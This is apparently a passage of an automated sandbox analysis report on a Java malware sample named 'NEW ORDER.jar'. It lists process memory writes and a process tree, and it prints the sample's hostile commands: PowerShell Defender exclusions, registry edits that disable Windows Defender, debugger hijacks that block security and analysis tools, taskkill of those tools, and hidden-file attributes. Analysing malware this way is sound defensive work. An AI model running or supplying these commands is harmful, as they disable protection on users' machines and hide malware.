PID 1108 wrote to memory of 1980	1108	java.exe	184
PID 1108 wrote to memory of 1980	1108	java.exe	184
PID 1108 wrote to memory of 1980	1108	java.exe	184
PID 1980 wrote to memory of 368	1980	cmd.exe	185
PID 1980 wrote to memory of 368	1980	cmd.exe	185
PID 1980 wrote to memory of 368	1980	cmd.exe	185
PID 1980 wrote to memory of 556	1980	cmd.exe	186
PID 1980 wrote to memory of 556	1980	cmd.exe	186
PID 1980 wrote to memory of 556	1980	cmd.exe	186
PID 1108 wrote to memory of 1508	1108	java.exe	187
PID 1108 wrote to memory of 1508	1108	java.exe	187
PID 1108 wrote to memory of 1508	1108	java.exe	187
PID 1508 wrote to memory of 1952	1508	cmd.exe	188
PID 1508 wrote to memory of 1952	1508	cmd.exe	188
PID 1508 wrote to memory of 1952	1508	cmd.exe	188
PID 1508 wrote to memory of 1700	1508	cmd.exe	189
PID 1508 wrote to memory of 1700	1508	cmd.exe	189
PID 1508 wrote to memory of 1700	1508	cmd.exe	189
PID 1108 wrote to memory of 1636	1108	java.exe	190
PID 1108 wrote to memory of 1636	1108	java.exe	190
PID 1108 wrote to memory of 1636	1108	java.exe	190
PID 1636 wrote to memory of 2028	1636	cmd.exe	191
PID 1636 wrote to memory of 2028	1636	cmd.exe	191
PID 1636 wrote to memory of 2028	1636	cmd.exe	191
PID 1636 wrote to memory of 1924	1636	cmd.exe	192
PID 1636 wrote to memory of 1924	1636	cmd.exe	192
PID 1636 wrote to memory of 1924	1636	cmd.exe	192
PID 1108 wrote to memory of 1104	1108	java.exe	193
PID 1108 wrote to memory of 1104	1108	java.exe	193
PID 1108 wrote to memory of 1104	1108	java.exe	193
PID 1104 wrote to memory of 332	1104	cmd.exe	194
PID 1104 wrote to memory of 332	1104	cmd.exe	194
PID 1104 wrote to memory of 332	1104	cmd.exe	194
PID 1104 wrote to memory of 872	1104	cmd.exe	195
PID 1104 wrote to memory of 872	1104	cmd.exe	195
PID 1104 wrote to memory of 872	1104	cmd.exe	195
PID 1108 wrote to memory of 668	1108	java.exe	196
PID 1108 wrote to memory of 668	1108	java.exe	196
PID 1108 wrote to memory of 668	1108	java.exe	196
PID 668 wrote to memory of 1976	668	cmd.exe	197
PID 668 wrote to memory of 1976	668	cmd.exe	197
PID 668 wrote to memory of 1976	668	cmd.exe	197
PID 1108 wrote to memory of 484	1108	java.exe	198
PID 1108 wrote to memory of 484	1108	java.exe	198
PID 1108 wrote to memory of 484	1108	java.exe	198
PID 668 wrote to memory of 1324	668	cmd.exe	199
PID 668 wrote to memory of 1324	668	cmd.exe	199
PID 668 wrote to memory of 1324	668	cmd.exe	199
PID 1108 wrote to memory of 1844	1108	java.exe	201
PID 1108 wrote to memory of 1844	1108	java.exe	201
PID 1108 wrote to memory of 1844	1108	java.exe	201
PID 1844 wrote to memory of 904	1844	cmd.exe	202
PID 1844 wrote to memory of 904	1844	cmd.exe	202
PID 1844 wrote to memory of 904	1844	cmd.exe	202
PID 1844 wrote to memory of 1840	1844	cmd.exe	203
PID 1844 wrote to memory of 1840	1844	cmd.exe	203
PID 1844 wrote to memory of 1840	1844	cmd.exe	203
PID 1108 wrote to memory of 1848	1108	java.exe	204
PID 1108 wrote to memory of 1848	1108	java.exe	204
PID 1108 wrote to memory of 1848	1108	java.exe	204
PID 1848 wrote to memory of 1776	1848	cmd.exe	205
PID 1848 wrote to memory of 1776	1848	cmd.exe	205
PID 1848 wrote to memory of 1776	1848	cmd.exe	205
PID 1848 wrote to memory of 1916	1848	cmd.exe	206
PID 1848 wrote to memory of 1916	1848	cmd.exe	206
PID 1848 wrote to memory of 1916	1848	cmd.exe	206
PID 1108 wrote to memory of 1992	1108	java.exe	207
PID 1108 wrote to memory of 1992	1108	java.exe	207
PID 1108 wrote to memory of 1992	1108	java.exe	207
PID 1992 wrote to memory of 1944	1992	cmd.exe	208
PID 1992 wrote to memory of 1944	1992	cmd.exe	208
PID 1992 wrote to memory of 1944	1992	cmd.exe	208
PID 1992 wrote to memory of 816	1992	cmd.exe	209
PID 1992 wrote to memory of 816	1992	cmd.exe	209
PID 1992 wrote to memory of 816	1992	cmd.exe	209
PID 1108 wrote to memory of 1800	1108	java.exe	210
PID 1108 wrote to memory of 1800	1108	java.exe	210
PID 1108 wrote to memory of 1800	1108	java.exe	210
PID 1800 wrote to memory of 1040	1800	cmd.exe	211
PID 1800 wrote to memory of 1040	1800	cmd.exe	211
PID 1800 wrote to memory of 1040	1800	cmd.exe	211
PID 1800 wrote to memory of 1920	1800	cmd.exe	212
PID 1800 wrote to memory of 1920	1800	cmd.exe	212
PID 1800 wrote to memory of 1920	1800	cmd.exe	212
PID 1108 wrote to memory of 1832	1108	java.exe	213
PID 1108 wrote to memory of 1832	1108	java.exe	213
PID 1108 wrote to memory of 1832	1108	java.exe	213
PID 1832 wrote to memory of 1908	1832	cmd.exe	214
PID 1832 wrote to memory of 1908	1832	cmd.exe	214
PID 1832 wrote to memory of 1908	1832	cmd.exe	214
PID 1832 wrote to memory of 1232	1832	cmd.exe	215
PID 1832 wrote to memory of 1232	1832	cmd.exe	215
PID 1832 wrote to memory of 1232	1832	cmd.exe	215
PID 1108 wrote to memory of 1496	1108	java.exe	216
PID 1108 wrote to memory of 1496	1108	java.exe	216
PID 1108 wrote to memory of 1496	1108	java.exe	216
PID 1496 wrote to memory of 1752	1496	cmd.exe	217
PID 1496 wrote to memory of 1752	1496	cmd.exe	217
PID 1496 wrote to memory of 1752	1496	cmd.exe	217
PID 1496 wrote to memory of 760	1496	cmd.exe	218
PID 1496 wrote to memory of 760	1496	cmd.exe	218
PID 1496 wrote to memory of 760	1496	cmd.exe	218
PID 1108 wrote to memory of 1560	1108	java.exe	219
PID 1108 wrote to memory of 1560	1108	java.exe	219
PID 1108 wrote to memory of 1560	1108	java.exe	219
PID 1560 wrote to memory of 1460	1560	cmd.exe	220
PID 1560 wrote to memory of 1460	1560	cmd.exe	220
PID 1560 wrote to memory of 1460	1560	cmd.exe	220
PID 1560 wrote to memory of 744	1560	cmd.exe	221
PID 1560 wrote to memory of 744	1560	cmd.exe	221
PID 1560 wrote to memory of 744	1560	cmd.exe	221
PID 1108 wrote to memory of 1768	1108	java.exe	222
PID 1108 wrote to memory of 1768	1108	java.exe	222
PID 1108 wrote to memory of 1768	1108	java.exe	222
PID 1768 wrote to memory of 1708	1768	cmd.exe	223
PID 1768 wrote to memory of 1708	1768	cmd.exe	223
PID 1768 wrote to memory of 1708	1768	cmd.exe	223
PID 1768 wrote to memory of 1852	1768	cmd.exe	224
PID 1768 wrote to memory of 1852	1768	cmd.exe	224
PID 1768 wrote to memory of 1852	1768	cmd.exe	224
PID 1108 wrote to memory of 1056	1108	java.exe	225
PID 1108 wrote to memory of 1056	1108	java.exe	225
PID 1108 wrote to memory of 1056	1108	java.exe	225
PID 1056 wrote to memory of 1088	1056	cmd.exe	226
PID 1056 wrote to memory of 1088	1056	cmd.exe	226
PID 1056 wrote to memory of 1088	1056	cmd.exe	226
PID 1056 wrote to memory of 2000	1056	cmd.exe	227
PID 1056 wrote to memory of 2000	1056	cmd.exe	227
PID 1056 wrote to memory of 2000	1056	cmd.exe	227
PID 1108 wrote to memory of 1220	1108	java.exe	228
PID 1108 wrote to memory of 1220	1108	java.exe	228
PID 1108 wrote to memory of 1220	1108	java.exe	228
PID 1220 wrote to memory of 556	1220	cmd.exe	229
PID 1220 wrote to memory of 556	1220	cmd.exe	229
PID 1220 wrote to memory of 556	1220	cmd.exe	229
PID 1108 wrote to memory of 268	1108	java.exe	230
PID 1108 wrote to memory of 268	1108	java.exe	230
PID 1108 wrote to memory of 268	1108	java.exe	230
PID 1220 wrote to memory of 1804	1220	cmd.exe	231
PID 1220 wrote to memory of 1804	1220	cmd.exe	231
PID 1220 wrote to memory of 1804	1220	cmd.exe	231
PID 1108 wrote to memory of 2028	1108	java.exe	233
PID 1108 wrote to memory of 2028	1108	java.exe	233
PID 1108 wrote to memory of 2028	1108	java.exe	233
PID 2028 wrote to memory of 1444	2028	cmd.exe	234
PID 2028 wrote to memory of 1444	2028	cmd.exe	234
PID 2028 wrote to memory of 1444	2028	cmd.exe	234
PID 2028 wrote to memory of 748	2028	cmd.exe	235
PID 2028 wrote to memory of 748	2028	cmd.exe	235
PID 2028 wrote to memory of 748	2028	cmd.exe	235
PID 1108 wrote to memory of 1100	1108	java.exe	236
PID 1108 wrote to memory of 1100	1108	java.exe	236
PID 1108 wrote to memory of 1100	1108	java.exe	236
PID 1100 wrote to memory of 1964	1100	cmd.exe	237
PID 1100 wrote to memory of 1964	1100	cmd.exe	237
PID 1100 wrote to memory of 1964	1100	cmd.exe	237
PID 1100 wrote to memory of 1816	1100	cmd.exe	238
PID 1100 wrote to memory of 1816	1100	cmd.exe	238
PID 1100 wrote to memory of 1816	1100	cmd.exe	238
PID 1108 wrote to memory of 1780	1108	java.exe	239
PID 1108 wrote to memory of 1780	1108	java.exe	239
PID 1108 wrote to memory of 1780	1108	java.exe	239
PID 1780 wrote to memory of 2040	1780	cmd.exe	240
PID 1780 wrote to memory of 2040	1780	cmd.exe	240
PID 1780 wrote to memory of 2040	1780	cmd.exe	240
PID 1780 wrote to memory of 388	1780	cmd.exe	241
PID 1780 wrote to memory of 388	1780	cmd.exe	241
PID 1780 wrote to memory of 388	1780	cmd.exe	241
PID 1108 wrote to memory of 484	1108	java.exe	242
PID 1108 wrote to memory of 484	1108	java.exe	242
PID 1108 wrote to memory of 484	1108	java.exe	242
PID 484 wrote to memory of 340	484	cmd.exe	243
PID 484 wrote to memory of 340	484	cmd.exe	243
PID 484 wrote to memory of 340	484	cmd.exe	243
PID 484 wrote to memory of 1060	484	cmd.exe	244
PID 484 wrote to memory of 1060	484	cmd.exe	244
PID 484 wrote to memory of 1060	484	cmd.exe	244
PID 1108 wrote to memory of 1916	1108	java.exe	245
PID 1108 wrote to memory of 1916	1108	java.exe	245
PID 1108 wrote to memory of 1916	1108	java.exe	245
PID 1916 wrote to memory of 1684	1916	cmd.exe	246
PID 1916 wrote to memory of 1684	1916	cmd.exe	246
PID 1916 wrote to memory of 1684	1916	cmd.exe	246
PID 1916 wrote to memory of 1796	1916	cmd.exe	247
PID 1916 wrote to memory of 1796	1916	cmd.exe	247
PID 1916 wrote to memory of 1796	1916	cmd.exe	247
PID 1108 wrote to memory of 1124	1108	java.exe	248
PID 1108 wrote to memory of 1124	1108	java.exe	248
PID 1108 wrote to memory of 1124	1108	java.exe	248
PID 1124 wrote to memory of 1040	1124	cmd.exe	249
PID 1124 wrote to memory of 1040	1124	cmd.exe	249
PID 1124 wrote to memory of 1040	1124	cmd.exe	249
PID 1124 wrote to memory of 1036	1124	cmd.exe	250
PID 1124 wrote to memory of 1036	1124	cmd.exe	250
PID 1124 wrote to memory of 1036	1124	cmd.exe	250
PID 1108 wrote to memory of 1632	1108	java.exe	251
PID 1108 wrote to memory of 1632	1108	java.exe	251
PID 1108 wrote to memory of 1632	1108	java.exe	251
PID 1632 wrote to memory of 1232	1632	cmd.exe	252
PID 1632 wrote to memory of 1232	1632	cmd.exe	252
PID 1632 wrote to memory of 1232	1632	cmd.exe	252
PID 1632 wrote to memory of 1068	1632	cmd.exe	253
PID 1632 wrote to memory of 1068	1632	cmd.exe	253
PID 1632 wrote to memory of 1068	1632	cmd.exe	253
PID 1108 wrote to memory of 1784	1108	java.exe	254
PID 1108 wrote to memory of 1784	1108	java.exe	254
PID 1108 wrote to memory of 1784	1108	java.exe	254
PID 1784 wrote to memory of 1072	1784	cmd.exe	255
PID 1784 wrote to memory of 1072	1784	cmd.exe	255
PID 1784 wrote to memory of 1072	1784	cmd.exe	255
PID 1784 wrote to memory of 1460	1784	cmd.exe	256
PID 1784 wrote to memory of 1460	1784	cmd.exe	256
PID 1784 wrote to memory of 1460	1784	cmd.exe	256
PID 1108 wrote to memory of 524	1108	java.exe	257
PID 1108 wrote to memory of 524	1108	java.exe	257
PID 1108 wrote to memory of 524	1108	java.exe	257
PID 524 wrote to memory of 1336	524	cmd.exe	258
PID 524 wrote to memory of 1336	524	cmd.exe	258
PID 524 wrote to memory of 1336	524	cmd.exe	258
PID 524 wrote to memory of 1852	524	cmd.exe	259
PID 524 wrote to memory of 1852	524	cmd.exe	259
PID 524 wrote to memory of 1852	524	cmd.exe	259
PID 1108 wrote to memory of 1984	1108	java.exe	260
PID 1108 wrote to memory of 1984	1108	java.exe	260
PID 1108 wrote to memory of 1984	1108	java.exe	260
PID 1984 wrote to memory of 240	1984	cmd.exe	261
PID 1984 wrote to memory of 240	1984	cmd.exe	261
PID 1984 wrote to memory of 240	1984	cmd.exe	261
PID 1984 wrote to memory of 1628	1984	cmd.exe	262
PID 1984 wrote to memory of 1628	1984	cmd.exe	262
PID 1984 wrote to memory of 1628	1984	cmd.exe	262
PID 1108 wrote to memory of 556	1108	java.exe	263
PID 1108 wrote to memory of 556	1108	java.exe	263
PID 1108 wrote to memory of 556	1108	java.exe	263
PID 556 wrote to memory of 844	556	cmd.exe	264
PID 556 wrote to memory of 844	556	cmd.exe	264
PID 556 wrote to memory of 844	556	cmd.exe	264
PID 556 wrote to memory of 108	556	cmd.exe	265
PID 556 wrote to memory of 108	556	cmd.exe	265
PID 556 wrote to memory of 108	556	cmd.exe	265
PID 1108 wrote to memory of 1444	1108	java.exe	266
PID 1108 wrote to memory of 1444	1108	java.exe	266
PID 1108 wrote to memory of 1444	1108	java.exe	266
PID 1444 wrote to memory of 1976	1444	cmd.exe	267
PID 1444 wrote to memory of 1976	1444	cmd.exe	267
PID 1444 wrote to memory of 1976	1444	cmd.exe	267
PID 1444 wrote to memory of 872	1444	cmd.exe	268
PID 1444 wrote to memory of 872	1444	cmd.exe	268
PID 1444 wrote to memory of 872	1444	cmd.exe	268
PID 1108 wrote to memory of 1512	1108	java.exe	269
PID 1108 wrote to memory of 1512	1108	java.exe	269
PID 1108 wrote to memory of 1512	1108	java.exe	269
PID 1512 wrote to memory of 1216	1512	cmd.exe	270
PID 1512 wrote to memory of 1216	1512	cmd.exe	270
PID 1512 wrote to memory of 1216	1512	cmd.exe	270
PID 1512 wrote to memory of 1324	1512	cmd.exe	271
PID 1512 wrote to memory of 1324	1512	cmd.exe	271
PID 1512 wrote to memory of 1324	1512	cmd.exe	271
PID 1108 wrote to memory of 1228	1108	java.exe	272
PID 1108 wrote to memory of 1228	1108	java.exe	272
PID 1108 wrote to memory of 1228	1108	java.exe	272
PID 1108 wrote to memory of 1064	1108	java.exe	274
PID 1108 wrote to memory of 1064	1108	java.exe	274
PID 1108 wrote to memory of 1064	1108	java.exe	274
PID 1064 wrote to memory of 1892	1064	cmd.exe	275
PID 1064 wrote to memory of 1892	1064	cmd.exe	275
PID 1064 wrote to memory of 1892	1064	cmd.exe	275
PID 1064 wrote to memory of 340	1064	cmd.exe	276
PID 1064 wrote to memory of 340	1064	cmd.exe	276
PID 1064 wrote to memory of 340	1064	cmd.exe	276
PID 1108 wrote to memory of 1748	1108	java.exe	277
PID 1108 wrote to memory of 1748	1108	java.exe	277
PID 1108 wrote to memory of 1748	1108	java.exe	277
PID 1748 wrote to memory of 1276	1748	cmd.exe	278
PID 1748 wrote to memory of 1276	1748	cmd.exe	278
PID 1748 wrote to memory of 1276	1748	cmd.exe	278
PID 1748 wrote to memory of 1360	1748	cmd.exe	279
PID 1748 wrote to memory of 1360	1748	cmd.exe	279
PID 1748 wrote to memory of 1360	1748	cmd.exe	279
PID 1108 wrote to memory of 1876	1108	java.exe	280
PID 1108 wrote to memory of 1876	1108	java.exe	280
PID 1108 wrote to memory of 1876	1108	java.exe	280
PID 1876 wrote to memory of 1752	1876	cmd.exe	281
PID 1876 wrote to memory of 1752	1876	cmd.exe	281
PID 1876 wrote to memory of 1752	1876	cmd.exe	281
PID 1876 wrote to memory of 1068	1876	cmd.exe	282
PID 1876 wrote to memory of 1068	1876	cmd.exe	282
PID 1876 wrote to memory of 1068	1876	cmd.exe	282
PID 1108 wrote to memory of 1620	1108	java.exe	283
PID 1108 wrote to memory of 1620	1108	java.exe	283
PID 1108 wrote to memory of 1620	1108	java.exe	283
PID 1620 wrote to memory of 1532	1620	cmd.exe	284
PID 1620 wrote to memory of 1532	1620	cmd.exe	284
PID 1620 wrote to memory of 1532	1620	cmd.exe	284
PID 1620 wrote to memory of 1052	1620	cmd.exe	285
PID 1620 wrote to memory of 1052	1620	cmd.exe	285
PID 1620 wrote to memory of 1052	1620	cmd.exe	285
PID 1108 wrote to memory of 1336	1108	java.exe	286
PID 1108 wrote to memory of 1336	1108	java.exe	286
PID 1108 wrote to memory of 1336	1108	java.exe	286
PID 1336 wrote to memory of 1088	1336	cmd.exe	287
PID 1336 wrote to memory of 1088	1336	cmd.exe	287
PID 1336 wrote to memory of 1088	1336	cmd.exe	287
PID 1336 wrote to memory of 1500	1336	cmd.exe	288
PID 1336 wrote to memory of 1500	1336	cmd.exe	288
PID 1336 wrote to memory of 1500	1336	cmd.exe	288
PID 1108 wrote to memory of 1628	1108	java.exe	289
PID 1108 wrote to memory of 1628	1108	java.exe	289
PID 1108 wrote to memory of 1628	1108	java.exe	289
PID 1628 wrote to memory of 1952	1628	cmd.exe	290
PID 1628 wrote to memory of 1952	1628	cmd.exe	290
PID 1628 wrote to memory of 1952	1628	cmd.exe	290
PID 1628 wrote to memory of 472	1628	cmd.exe	291
PID 1628 wrote to memory of 472	1628	cmd.exe	291
PID 1628 wrote to memory of 472	1628	cmd.exe	291
PID 1108 wrote to memory of 1788	1108	java.exe	292
PID 1108 wrote to memory of 1788	1108	java.exe	292
PID 1108 wrote to memory of 1788	1108	java.exe	292
PID 1788 wrote to memory of 1220	1788	cmd.exe	293
PID 1788 wrote to memory of 1220	1788	cmd.exe	293
PID 1788 wrote to memory of 1220	1788	cmd.exe	293
PID 1788 wrote to memory of 1464	1788	cmd.exe	294
PID 1788 wrote to memory of 1464	1788	cmd.exe	294
PID 1788 wrote to memory of 1464	1788	cmd.exe	294
PID 1108 wrote to memory of 1792	1108	java.exe	295
PID 1108 wrote to memory of 1792	1108	java.exe	295
PID 1108 wrote to memory of 1792	1108	java.exe	295
PID 1792 wrote to memory of 1548	1792	cmd.exe	296
PID 1792 wrote to memory of 1548	1792	cmd.exe	296
PID 1792 wrote to memory of 1548	1792	cmd.exe	296
PID 1792 wrote to memory of 1448	1792	cmd.exe	297
PID 1792 wrote to memory of 1448	1792	cmd.exe	297
PID 1792 wrote to memory of 1448	1792	cmd.exe	297
PID 1108 wrote to memory of 484	1108	java.exe	298
PID 1108 wrote to memory of 484	1108	java.exe	298
PID 1108 wrote to memory of 484	1108	java.exe	298
PID 484 wrote to memory of 1496	484	cmd.exe	299
PID 484 wrote to memory of 1496	484	cmd.exe	299
PID 484 wrote to memory of 1496	484	cmd.exe	299
PID 484 wrote to memory of 1648	484	cmd.exe	300
PID 484 wrote to memory of 1648	484	cmd.exe	300
PID 484 wrote to memory of 1648	484	cmd.exe	300
PID 1108 wrote to memory of 1632	1108	java.exe	301
PID 1108 wrote to memory of 1632	1108	java.exe	301
PID 1108 wrote to memory of 1632	1108	java.exe	301
PID 1632 wrote to memory of 888	1632	cmd.exe	302
PID 1632 wrote to memory of 888	1632	cmd.exe	302
PID 1632 wrote to memory of 888	1632	cmd.exe	302
PID 1632 wrote to memory of 1636	1632	cmd.exe	303
PID 1632 wrote to memory of 1636	1632	cmd.exe	303
PID 1632 wrote to memory of 1636	1632	cmd.exe	303
PID 1108 wrote to memory of 1996	1108	java.exe	304
PID 1108 wrote to memory of 1996	1108	java.exe	304
PID 1108 wrote to memory of 1996	1108	java.exe	304
PID 1108 wrote to memory of 1556	1108	java.exe	306
PID 1108 wrote to memory of 1556	1108	java.exe	306
PID 1108 wrote to memory of 1556	1108	java.exe	306
PID 1108 wrote to memory of 1332	1108	java.exe	308
PID 1108 wrote to memory of 1332	1108	java.exe	308
PID 1108 wrote to memory of 1332	1108	java.exe	308
PID 1108 wrote to memory of 1892	1108	java.exe	310
PID 1108 wrote to memory of 1892	1108	java.exe	310
PID 1108 wrote to memory of 1892	1108	java.exe	310
PID 1108 wrote to memory of 1864	1108	java.exe	312
PID 1108 wrote to memory of 1864	1108	java.exe	312
PID 1108 wrote to memory of 1864	1108	java.exe	312

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1792	attrib.exe
1776	attrib.exe
1784	attrib.exe
1752	attrib.exe
1820	attrib.exe
1828	attrib.exe
1868	attrib.exe
1332	attrib.exe

C:\Windows\system32\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.jar"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1108
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:748
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:388
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1068
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1512
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1472
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:1820
- C:\Windows\system32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:1828
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\FVKwo\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1868
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\FVKwo\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1332
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\FVKwo
  2⤵
  - Views/modifies file attributes
  PID:1792
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\FVKwo
  2⤵
  - Views/modifies file attributes
  PID:1776
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\FVKwo
  2⤵
  - Views/modifies file attributes
  PID:1784
- C:\Windows\system32\attrib.exe
  attrib +h +s +r C:\Users\Admin\FVKwo\WbZqr.class
  2⤵
  - Views/modifies file attributes
  PID:1752
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\FVKwo','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\FVKwo\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1648
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:2004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:1464
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1532
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1920
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1916
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1996
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1124
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:1100
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:888
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:340
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:1556
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:268
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1232
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:568
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1520
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1068
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:1064
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1708
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1684
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:240
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1844
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1336
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1800
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1636
- C:\Windows\System32\reg.exe
